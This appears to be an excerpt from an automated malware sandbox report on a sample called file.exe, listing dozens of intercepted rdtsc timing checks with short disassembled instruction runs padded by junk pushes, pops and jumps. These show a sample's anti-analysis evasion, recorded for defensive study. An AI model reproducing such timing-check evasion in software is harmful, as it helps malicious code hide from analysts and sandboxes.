                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8007BE second address: 8007DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F76A540C8DAh 0x0000000b jmp 00007F76A540C8DAh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8007DB second address: 8007E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 800941 second address: 800955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76A540C8DEh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 800C27 second address: 800C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A4C93C1Ch 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d jnp 00007F76A4C93C16h 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 800C42 second address: 800C47 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803EDA second address: 803EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 jg 00007F76A4C93C16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803EEA second address: 803EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803EEF second address: 803F07 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F76A4C93C1Eh 0x00000008 jo 00007F76A4C93C1Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8041A8 second address: 8041AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8041AC second address: 8041B1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8041B1 second address: 8041F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jp 00007F76A540C8E7h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jbe 00007F76A540C8F4h 0x00000014 jmp 00007F76A540C8E8h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8041F0 second address: 8041FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E624 second address: 77E63C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F76A540C8E0h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8067A9 second address: 8067B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F76A4C93C16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809EFD second address: 809F19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A540C8DBh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F76A540C8D6h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A029 second address: 80A02F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E6C2 second address: 80E6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E6C8 second address: 80E6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E7F6 second address: 80E7FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E7FA second address: 80E811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F76A4C93C16h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80EA72 second address: 80EA87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A540C8E1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BAE33 second address: 7BAE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F76A4C93C16h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BAE45 second address: 7BAEB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A540C8E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F76A540C8D8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+1247BE86h] 0x0000002b adc di, 7FAEh 0x00000030 add eax, ebx 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F76A540C8D8h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 jnp 00007F76A540C8D6h 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BAEB7 second address: 7BAEBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BAEBB second address: 7BAEC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80EEC3 second address: 80EEC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 812D2E second address: 812D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 jns 00007F76A540C8DCh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 812D41 second address: 812D46 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 812EAC second address: 812ED7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F76A540C8E1h 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F76A540C8D8h 0x00000013 jmp 00007F76A540C8DAh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 812ED7 second address: 812EDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 812EDD second address: 812EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 812EE1 second address: 812EE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8131BE second address: 8131D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F76A540C8D6h 0x0000000a jmp 00007F76A540C8DCh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813444 second address: 813448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813448 second address: 81344C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81A8CB second address: 81A8D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81ABF9 second address: 81ABFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81AECD second address: 81AEF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A4C93C27h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F76A4C93C16h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81AEF3 second address: 81AEF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B4C0 second address: 81B4C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B791 second address: 81B79B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81BE0F second address: 81BE31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F76A4C93C28h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C11F second address: 81C123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C408 second address: 81C422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A4C93C22h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C422 second address: 81C427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C427 second address: 81C42D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C42D second address: 81C431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F5B8 second address: 81F5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F76A4C93C22h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F5D3 second address: 81F5D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81FDA1 second address: 81FDA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81FDA9 second address: 81FDC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F76A540C8E8h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81FDC8 second address: 81FDDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C93C1Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 820095 second address: 8200AE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F76A540C8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F76A540C8DCh 0x00000013 jnp 00007F76A540C8D6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 824A57 second address: 824A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 824A5F second address: 824A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F76A540C8E2h 0x0000000b jno 00007F76A540C8D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AC3E second address: 82AC42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AC42 second address: 82AC4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AC4C second address: 82AC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AC50 second address: 82AC5A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F76A540C8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AC5A second address: 82AC61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82B329 second address: 82B32F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82B32F second address: 82B333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82B333 second address: 82B349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F76A540C8E2h 0x0000000e jne 00007F76A540C8D6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833663 second address: 833669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833669 second address: 8336A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jp 00007F76A540C8D6h 0x0000000c jmp 00007F76A540C8E6h 0x00000011 pop ecx 0x00000012 jmp 00007F76A540C8E3h 0x00000017 popad 0x00000018 push edi 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8336A4 second address: 8336AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8406D3 second address: 8406EF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F76A540C8DCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F76A540C8DAh 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8406EF second address: 8406F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844EB7 second address: 844EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F76A540C8D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 853849 second address: 85384F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85384F second address: 85385B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jo 00007F76A540C8D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85385B second address: 853874 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jns 00007F76A4C93C16h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 853874 second address: 85387A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C0A1 second address: 85C0F5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d jmp 00007F76A4C93C26h 0x00000012 jmp 00007F76A4C93C29h 0x00000017 jmp 00007F76A4C93C1Dh 0x0000001c popad 0x0000001d popad 0x0000001e push ebx 0x0000001f jng 00007F76A4C93C1Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85A9E2 second address: 85A9E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85A9E8 second address: 85A9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85A9EC second address: 85AA0E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F76A540C8D6h 0x00000008 jmp 00007F76A540C8E5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85AB72 second address: 85AB97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C93C21h 0x00000007 jmp 00007F76A4C93C1Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85AE35 second address: 85AE43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85AE43 second address: 85AE47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85AF83 second address: 85AF87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B116 second address: 85B12D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F76A4C93C1Bh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B12D second address: 85B13D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F76A540C8D6h 0x00000008 jno 00007F76A540C8D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B2D0 second address: 85B2D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B2D5 second address: 85B2E0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007F76A540C8D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B2E0 second address: 85B306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F76A4C93C1Ch 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jnp 00007F76A4C93C1Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BD9B second address: 85BD9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BD9F second address: 85BDBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F76A4C93C28h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FCA1 second address: 85FCA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FCA5 second address: 85FCC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C93C1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F76A4C93C22h 0x0000000f jl 00007F76A4C93C16h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85F861 second address: 85F86A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85F86A second address: 85F86E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85F86E second address: 85F884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A540C8DDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E3F4 second address: 86E40F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F76A4C93C26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E783 second address: 87E787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E787 second address: 87E78D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88EACC second address: 88EAD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88EAD0 second address: 88EAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88ED6B second address: 88ED7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnc 00007F76A540C8D6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
